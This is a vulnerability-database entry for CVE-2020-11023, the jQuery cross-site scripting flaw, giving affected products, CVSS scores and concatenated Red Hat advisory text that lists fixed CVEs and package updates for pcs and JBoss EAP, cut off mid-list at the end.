2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS 2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays 2135770 - CVE-2022-40150 jettison: memory exhaustion via user-supplied XML or JSON data 2135771 - CVE-2022-40149 jettison: parser crash by stackoverflow 2145194 - CVE-2022-45047 mina-sshd: Java unsafe deserialization vulnerability 2155682 - CVE-2022-46364 Apache CXF: SSRF Vulnerability 2155970 - CVE-2022-45693 jettison: If the value in map is the map's self, the new new JSONObject(map) cause StackOverflowError which may lead to dos
- JIRA issues fixed (https://issues.jboss.org/):
JBEAP-23864 - (7.4.z) Upgrade xmlsec from 2.1.7.redhat-00001 to 2.2.3.redhat-00001 JBEAP-23865 - GSS Upgrade Apache CXF from 3.3.13.redhat-00001 to 3.4.10.redhat-00001 JBEAP-23866 - (7.4.z) Upgrade wss4j from 2.2.7.redhat-00001 to 2.3.3.redhat-00001 JBEAP-23928 - Tracker bug for the EAP 7.4.9 release for RHEL-9 JBEAP-24055 - (7.4.z) Upgrade HAL from 3.3.15.Final-redhat-00001 to 3.3.16.Final-redhat-00001 JBEAP-24081 - (7.4.z) Upgrade Elytron from 1.15.14.Final-redhat-00001 to 1.15.15.Final-redhat-00001 JBEAP-24095 - (7.4.z) Upgrade elytron-web from 1.9.2.Final-redhat-00001 to 1.9.3.Final-redhat-00001 JBEAP-24100 - GSS Upgrade Undertow from 2.2.20.SP1-redhat-00001 to 2.2.22.SP3-redhat-00001 JBEAP-24127 - (7.4.z) UNDERTOW-2123 - Update AsyncContextImpl.dispatch to use proper value JBEAP-24128 - (7.4.z) Upgrade Hibernate Search from 5.10.7.Final-redhat-00001 to 5.10.13.Final-redhat-00001 JBEAP-24132 - GSS Upgrade Ironjacamar from 1.5.3.SP2-redhat-00001 to 1.5.10.Final-redhat-00001 JBEAP-24147 - (7.4.z) Upgrade jboss-ejb-client from 4.0.45.Final-redhat-00001 to 4.0.49.Final-redhat-00001 JBEAP-24167 - (7.4.z) Upgrade WildFly Core from 15.0.19.Final-redhat-00001 to 15.0.21.Final-redhat-00002 JBEAP-24191 - GSS Upgrade remoting from 5.0.26.SP1-redhat-00001 to 5.0.27.Final-redhat-00001 JBEAP-24195 - GSS Upgrade JSF API from 3.0.0.SP06-redhat-00001 to 3.0.0.SP07-redhat-00001 JBEAP-24207 - (7.4.z) Upgrade Soteria from 1.0.1.redhat-00002 to 1.0.1.redhat-00003 JBEAP-24248 - (7.4.z) ELY-2492 - Upgrade sshd-common in Elytron from 2.7.0 to 2.9.2 JBEAP-24426 - (7.4.z) Upgrade Elytron from 1.15.15.Final-redhat-00001 to 1.15.16.Final-redhat-00001 JBEAP-24427 - (7.4.z) Upgrade WildFly Core from 15.0.21.Final-redhat-00002 to 15.0.22.Final-redhat-00001
- Solution:
For OpenShift Container Platform 4.6 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-rel ease-notes.html
Details on how to access this content are available at https://docs.openshift.com/container-platform/4.6/updating/updating-cluster - -cli.html. Description:
Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an on-premise OpenShift Container Platform installation. Bugs fixed (https://bugzilla.redhat.com/):
1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic 1850004 - CVE-2020-11023 jQuery: passing HTML containing elements to manipulation methods could result in untrusted code execution 1850034 - CVE-2020-12666 macaron: open redirect in the static handler 1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash 1857412 - CVE-2020-8203 nodejs-lodash: prototype pollution in zipObjectDeep function
6
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12.7"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.1"
},
{
"_id": null,
"model": "financial services revenue management and billing analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.8"
},
{
"_id": null,
"model": "hyperion financial reporting",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1.2.4"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12.0"
},
{
"_id": null,
"model": "jd edwards enterpriseone orchestrator",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.5.0"
},
{
"_id": null,
"model": "oncommand insight",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "healthcare translational research",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.2.1"
},
{
"_id": null,
"model": "drupal",
"scope": "gte",
"trust": 1.0,
"vendor": "drupal",
"version": "8.7.0"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1"
},
{
"_id": null,
"model": "rest data services",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.2.0.4"
},
{
"_id": null,
"model": "financial services revenue management and billing analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.7"
},
{
"_id": null,
"model": "communications operations monitor",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "4.3"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.2"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "webcenter sites",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "drupal",
"scope": "gte",
"trust": 1.0,
"vendor": "drupal",
"version": "7.0"
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "banking enterprise collections",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.8.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12.4"
},
{
"_id": null,
"model": "siebel mobile",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "20.12"
},
{
"_id": null,
"model": "storagetek acsls",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.5.1"
},
{
"_id": null,
"model": "blockchain platform",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "21.1.2"
},
{
"_id": null,
"model": "communications analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.1"
},
{
"_id": null,
"model": "drupal",
"scope": "lt",
"trust": 1.0,
"vendor": "drupal",
"version": "8.7.14"
},
{
"_id": null,
"model": "oncommand system manager",
"scope": "lte",
"trust": 1.0,
"vendor": "netapp",
"version": "3.1.3"
},
{
"_id": null,
"model": "communications eagle application processor",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.4.0"
},
{
"_id": null,
"model": "jd edwards enterpriseone tools",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.5.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.4.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.10.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "oncommand system manager",
"scope": "gte",
"trust": 1.0,
"vendor": "netapp",
"version": "3.0"
},
{
"_id": null,
"model": "communications eagle application processor",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.1.0"
},
{
"_id": null,
"model": "jquery",
"scope": "gte",
"trust": 1.0,
"vendor": "jquery",
"version": "1.0.3"
},
{
"_id": null,
"model": "communications session report manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.1"
},
{
"_id": null,
"model": "peoplesoft enterprise human capital management resources",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2"
},
{
"_id": null,
"model": "rest data services",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0.1"
},
{
"_id": null,
"model": "communications interactive session recorder",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "6.1"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "33"
},
{
"_id": null,
"model": "drupal",
"scope": "lt",
"trust": 1.0,
"vendor": "drupal",
"version": "7.70"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "32"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "rest data services",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19c"
},
{
"_id": null,
"model": "healthcare translational research",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.4.0"
},
{
"_id": null,
"model": "communications session report manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.1.0.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.1"
},
{
"_id": null,
"model": "communications session report manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.2.11"
},
{
"_id": null,
"model": "jquery",
"scope": "lt",
"trust": 1.0,
"vendor": "jquery",
"version": "3.5.0"
},
{
"_id": null,
"model": "oss support tools",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "2.12.41"
},
{
"_id": null,
"model": "cloud insights storage workload security agent",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "log correlation engine",
"scope": "lt",
"trust": 1.0,
"vendor": "tenable",
"version": "6.0.9"
},
{
"_id": null,
"model": "financial services regulatory reporting for de nederlandsche bank",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.4"
},
{
"_id": null,
"model": "rest data services",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18c"
},
{
"_id": null,
"model": "communications element manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1"
},
{
"_id": null,
"model": "rest data services",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.0.2"
},
{
"_id": null,
"model": "business intelligence",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "5.9.0.0.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.3.0.0"
},
{
"_id": null,
"model": "healthcare translational research",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.3.1"
},
{
"_id": null,
"model": "communications operations monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.4"
},
{
"_id": null,
"model": "health sciences inform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.3.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "healthcare translational research",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.3.2"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12.0"
},
{
"_id": null,
"model": "webcenter sites",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "snap creator framework",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications session route manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "storagetek tape analytics sw tool",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.3.1"
},
{
"_id": null,
"model": "communications services gatekeeper",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.0"
},
{
"_id": null,
"model": "snapcenter server",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "drupal",
"scope": "gte",
"trust": 1.0,
"vendor": "drupal",
"version": "8.8.0"
},
{
"_id": null,
"model": "active iq unified manager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "application testing suite",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.3.0.1"
},
{
"_id": null,
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "drupal",
"scope": "lt",
"trust": 1.0,
"vendor": "drupal",
"version": "8.8.6"
},
{
"_id": null,
"model": "blockchain platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.1.2"
},
{
"_id": null,
"model": "communications operations monitor",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "4.1"
},
{
"_id": null,
"model": "banking enterprise collections",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.7.0"
},
{
"_id": null,
"model": "max data",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8.9"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "31"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "application express",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "20.2"
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "hci baseboard management controller",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications interactive session recorder",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "6.4"
},
{
"_id": null,
"model": "jquery",
"scope": null,
"trust": 0.8,
"vendor": "jquery",
"version": null
},
{
"_id": null,
"model": "hitachi ops center common services",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-005056"
},
{
"db": "NVD",
"id": "CVE-2020-11023"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "164887"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "170819"
},
{
"db": "PACKETSTORM",
"id": "170823"
},
{
"db": "PACKETSTORM",
"id": "159727"
},
{
"db": "PACKETSTORM",
"id": "158797"
}
],
"trust": 0.6
},
"cve": "CVE-2020-11023",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2020-11023",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-163560",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2020-11023",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "NONE",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.6,
"id": "CVE-2020-11023",
"impactScore": 4.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2020-11023",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-11023",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2020-11023",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2020-11023",
"trust": 0.8,
"value": "Medium"
},
{
"author": "VULHUB",
"id": "VHN-163560",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-11023",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163560"
},
{
"db": "VULMON",
"id": "CVE-2020-11023"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005056"
},
{
"db": "NVD",
"id": "CVE-2020-11023"
},
{
"db": "NVD",
"id": "CVE-2020-11023"
}
]
},
"description": {
"_id": null,
"data": "In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing \u003coption\u003e elements from untrusted sources - even after sanitizing it - to one of jQuery\u0027s DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. jQuery Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. jQuery is an open source, cross-browser JavaScript library developed by American John Resig programmers. The library simplifies the operation between HTML and JavaScript, and has the characteristics of modularization and plug-in extension. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Low: pcs security, bug fix, and enhancement update\nAdvisory ID: RHSA-2021:4142-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2021:4142\nIssue date: 2021-11-09\nCVE Names: CVE-2020-7656 CVE-2020-11023\n====================================================================\n1. Summary:\n\nAn update for pcs is now available for Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Low. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux HighAvailability (v. 8) - aarch64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux ResilientStorage (v. 8) - ppc64le, s390x, x86_64\n\n3. Description:\n\nThe pcs packages provide a command-line configuration system for the\nPacemaker and Corosync utilities. \n\nThe following packages have been upgraded to a later upstream version: pcs\n(0.10.10). \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.5 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1290830 - [RFE] pcs command is missing a way to retrieve the status of a single resource\n1432097 - pcs status nodes shows incomplete information when both standby and maintenance modes are set for a node\n1678273 - Moving the last resource from a group may result in an invalid CIB\n1690419 - Improve guest node error message when pacemaker_remote is running\n1720221 - [RFE] Add support for corosync option totem.block_unlisted_ips\n1759995 - [RFE] Need ability to add/remove storage devices with scsi fencing\n1841019 - [TechPreview Exit][RFE] Add a \u0027local\u0027 cluster setup command\n1850004 - CVE-2020-11023 jquery: Untrusted code execution via \u003coption\u003e tag in HTML passed to DOM manipulation methods\n1850119 - CVE-2020-7656 jquery: Cross-site scripting (XSS) via \u003cscript\u003e HTML tags containing whitespaces\n1854238 - Labeling and Confirmation Dialog for UI Elements start(on)/stop(off)/restart(reboot)\n1872378 - [RFE] Provide a way to add a scsi fencing device to a cluster without requiring a restart of all cluster resources\n1885293 - Support new role terminology in pacemaker 2.1\n1885302 - reflect changes in crm_mon --as-xml\n1896458 - Default rules with node attributes expressions can be created but are not in effect\n1909901 - [RFE] Add --quiet flag to pcs resource disable --safe to only show error messages instead of full output\n1922996 - New web UI - add more functionalities to the cluster management\n1927384 - New web UI - clone and group settings are not in effect when creating new resource\n1927394 - New web UI - cleanup of resource and fence device doesn\u0027t work\n1930886 - Update help/man pcs to include clone id as an option in \u0027pcs resource unclone\u0027 parameters\n1935594 - pcs rebase bz for 8.5\n1984901 - sbd can\u0027t be enabled via pcs with stopped cluster\n1991654 - update-scsi-devices command unfence a node without quorum\n1992668 - [RFE] Provide add/remove syntax for command `pcs stonith update-scsi-devices`\n1998454 - nginx resource can\u0027t be created\n\n6. Package List:\n\nRed Hat Enterprise Linux HighAvailability (v. 8):\n\nSource:\npcs-0.10.10-4.el8.src.rpm\n\naarch64:\npcs-0.10.10-4.el8.aarch64.rpm\npcs-snmp-0.10.10-4.el8.aarch64.rpm\n\nppc64le:\npcs-0.10.10-4.el8.ppc64le.rpm\npcs-snmp-0.10.10-4.el8.ppc64le.rpm\n\ns390x:\npcs-0.10.10-4.el8.s390x.rpm\npcs-snmp-0.10.10-4.el8.s390x.rpm\n\nx86_64:\npcs-0.10.10-4.el8.x86_64.rpm\npcs-snmp-0.10.10-4.el8.x86_64.rpm\n\nRed Hat Enterprise Linux ResilientStorage (v. 8):\n\nSource:\npcs-0.10.10-4.el8.src.rpm\n\nppc64le:\npcs-0.10.10-4.el8.ppc64le.rpm\npcs-snmp-0.10.10-4.el8.ppc64le.rpm\n\ns390x:\npcs-0.10.10-4.el8.s390x.rpm\npcs-snmp-0.10.10-4.el8.s390x.rpm\n\nx86_64:\npcs-0.10.10-4.el8.x86_64.rpm\npcs-snmp-0.10.10-4.el8.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2020-7656\nhttps://access.redhat.com/security/cve/CVE-2020-11023\nhttps://access.redhat.com/security/updates/classification/#low\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.5_release_notes/\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYYre19zjgjWX9erEAQhbXQ//fpAgz6azVHUidymjlIJ/d65HrM9a+hwU\n2c7zeYGKSBUpxWTIo0LzwVn7oQTJpmPdbDZzedS14e3ZijQcMjwImHI6yzlAkDxl\nhycmu4PakPBE3s7tmOIaUybc8opHPDLGbyBvohe7O3U+5oTvUBWhI35jeX3CTjsE\nRQFEwII4uqiTJ5pOnVN0TFfkooz5pY6oArGPg3kFb+17T9C0TWXxB/Nbyqg+yLJ3\nkrjB/aFgcm2RsP+IFB9Rg6RFaovKozXhckhJ+UxC2sQWKehnU8bhLVCf+l5psM6l\njnQtZi2LQOXlB8UQsjK3PWtyxVF7/MFmfLK7VX3RStCxukLKDIGc99tYl4zjgrJQ\nLshNnrn6Lz6iWiMFPFnwDhOAbey5LUrpygQUgVU1t4Mhtlpu5FTPGxiZkSVdPPUe\nKg/VCDkxPMVO6Mhnjg6axWYiv3WmvM3DLTL0alqjyShe6BW2E/BB8trt9eaCpoe/\nEtDBmrBKwLyK5LnToeLK0GL+HDGQDUjL0eWRNKJox8PVtFEtSkyn7I8jaOVeyTIc\nF9kOxECcY4tQBFegYaDXCIIBAGJda4eyzZR95zzwRWdl8AxuffV8n7enKfShMeqY\nL1HtkJq3Twced5fqhHRhqwKHEzWl3nKqTz8/gt5OjjLKNZ0M62oTeUjR918+k7+U\nOPYd9garVDY=fv9r\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nRed Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak\nproject, that provides authentication and standards-based single sign-on\ncapabilities for web and mobile applications. Description:\n\nRed Hat JBoss Enterprise Application Platform 7 is a platform for Java\napplications based on the WildFly application runtime. \n\nSecurity Fix(es):\n\n* jquery: Prototype pollution in object\u0027s prototype leading to denial of\nservice, remote code execution, or property injection (CVE-2019-11358)\n\n* jquery: Cross-site scripting via cross-domain ajax requests\n(CVE-2015-9251)\n\n* bootstrap: Cross-site Scripting (XSS) in the collapse data-parent\nattribute\n(CVE-2018-14040)\n\n* jquery: Untrusted code execution via \u003coption\u003e tag in HTML passed to DOM\nmanipulation methods (CVE-2020-11023)\n\n* jquery: Cross-site scripting due to improper injQuery.htmlPrefilter\nmethod\n(CVE-2020-11022)\n\n* bootstrap: XSS in the data-target attribute (CVE-2016-10735)\n\n* bootstrap: Cross-site Scripting (XSS) in the data-target property of\nscrollspy\n(CVE-2018-14041)\n\n* sshd-common: mina-sshd: Java unsafe deserialization vulnerability\n(CVE-2022-45047)\n\n* woodstox-core: woodstox to serialise XML data was vulnerable to Denial of\nService attacks (CVE-2022-40152)\n\n* bootstrap: Cross-site Scripting (XSS) in the data-container property of\ntooltip (CVE-2018-14042)\n\n* bootstrap: XSS in the tooltip or popover data-template attribute\n(CVE-2019-8331)\n\n* nodejs-moment: Regular expression denial of service (CVE-2017-18214)\n\n* wildfly-elytron: possible timing attacks via use of unsafe comparator\n(CVE-2022-3143)\n\n* jackson-databind: use of deeply nested arrays (CVE-2022-42004)\n\n* jackson-databind: deep wrapper array nesting wrt\nUNWRAP_SINGLE_VALUE_ARRAYS\n(CVE-2022-42003)\n\n* jettison: parser crash by stackoverflow (CVE-2022-40149)\n\n* jettison: memory exhaustion via user-supplied XML or JSON data\n(CVE-2022-40150)\n\n* jettison: If the value in map is the map\u0027s self, the new new\nJSONObject(map) cause StackOverflowError which may lead to dos\n(CVE-2022-45693)\n\n* CXF: Apache CXF: SSRF Vulnerability (CVE-2022-46364)\n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):\n\n1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests\n1553413 - CVE-2017-18214 nodejs-moment: Regular expression denial of service\n1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute\n1601616 - CVE-2018-14041 bootstrap: Cross-site Scripting (XSS) in the data-target property of scrollspy\n1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip\n1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute\n1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute\n1701972 - CVE-2019-11358 jquery: Prototype pollution in object\u0027s prototype leading to denial of service, remote code execution, or property injection\n1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method\n1850004 - CVE-2020-11023 jquery: Untrusted code execution via \u003coption\u003e tag in HTML passed to DOM manipulation methods\n2124682 - CVE-2022-3143 wildfly-elytron: possible timing attacks via use of unsafe 